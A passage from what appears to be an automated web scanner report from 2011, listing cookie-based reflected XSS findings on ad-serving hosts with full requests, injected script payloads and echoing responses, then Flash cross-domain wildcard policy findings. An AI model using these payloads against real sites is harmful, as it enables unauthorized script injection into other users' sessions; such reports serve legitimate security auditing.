Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=685de"-alert(1)-"60e51d37b2a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=9844^2&11953^2; csi15=1295156.js^2^1315320939^1315320950&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:10 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:10 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 15:57:10 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^260; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61369; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=1300434.js^5^1315321030^1315321030&1295121.js^3^1315321030^1315321030&2553663.js^5^1315321026^1315321026&1295156.js^3^1315320939^1315321026&638177.js^2^1315313132^-1612641032; expires=Tue, 13-Sep-2011 14:57:10 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1842

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1300434"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=685de"-alert(1)-"60e51d37b2a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.95. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6451/11953/20435-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dcb9"-alert(1)-"3db46c88d9f was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6451/11953/20435-2.js?cb=0.2368586107622832&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=1dcb9"-alert(1)-"3db46c88d9f; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6451/11953; ses15=9844^2&11953^5; csi15=2553663.js^2^1315321038^1315321048&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:46 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:46 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 15:57:46 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^231c9a%00%0d%0a98f953b2934&11953^5; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61333; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=1300433.js^18^1315321062^1315321066&1295118.js^3^1315321062^1315321062&2553662.js^5^1315321061^1315321061&1295153.js^3^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^-1612640932; expires=Tue, 13-Sep-2011 14:57:46 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1842

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1300433"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=1dcb9"-alert(1)-"3db46c88d9f\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.96. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67a75"><script>alert(1)</script>5b71f4343a7 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=67a75"><script>alert(1)</script>5b71f4343a7; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:10 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:10 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=60; expires=Tue, 06-Sep-2011 15:59:10 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^744f40729e51a8caac2210640; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61249; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1785

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=67a75"><script>alert(1)</script>5b71f4343a7" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

3.97. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e19"-alert(1)-"aad8da393bf was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/dk.js?defaulting_ad=x13d7d2.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=f1e19"-alert(1)-"aad8da393bf; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^10; csi15=1300434.js^1^1315322155^1315322155&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:16:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 16:16:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=60; expires=Tue, 06-Sep-2011 16:16:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^1044f407298942487860d6b793; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60237; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1716

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3158455"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=f1e19"-alert(1)-"aad8da393bf\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.98. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload 5b8f5<script>alert(1)</script>aa3aff42c32 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:11:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32; Path=/
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:11:28 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32","s_vi":"[CS]v1|27331A26051D3991-6000010800171907[CE]"}});

3.99. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_nr cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the s_nr cookie is copied into the HTML document as plain text between tags. The payload 60d58<script>alert(1)</script>39205ed221 was submitted in the s_nr cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=131344646830060d58<script>alert(1)</script>39205ed221; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:50 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA_CP15 (build: CVSTag=https://svn.jboss.org/repos/jbossas/tags/JBoss_4_0_5_GA_CP15 date=200901081058)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:01:00 GMT
Content-Length: 207
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"131344646830060d58<script>alert(1)</script>39205ed221","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});

3.100. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the s_vi cookie is copied into the HTML document as plain text between tags. The payload 1a3d0<script>alert(1)</script>a48e60d2b0a was submitted in the s_vi cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]1a3d0<script>alert(1)</script>a48e60d2b0a

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:53 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:01:03 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]1a3d0<script>alert(1)</script>a48e60d2b0a"}});

4. Flash cross-domain policy

There are 135 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.2. http://a1.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 06 Sep 2011 14:57:10 GMT
Xonnection: Xeep-alive
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://action.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Tue, 06 Sep 2011 16:45:41 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.4. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 06 Sep 2011 17:05:42 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.5. http://admin.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Tue, 06 Sep 2011 16:12:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.6. http://ads.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:15f2"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 14:57:09 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.7. http://ads.rnmd.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.rnmd.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.rnmd.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:48 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
Last-Modified: Fri, 26 Aug 2011 16:48:34 GMT
ETag: "150291-80-4ab6b50e6dc80"
Accept-Ranges: bytes
Content-Length: 128
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.8. http://afe.specificclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: afe.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.9. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Tue, 06 Sep 2011 23:17:09 GMT
Date: Mon, 05 Sep 2011 23:17:09 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 58526

<?xml version="1.0"?>
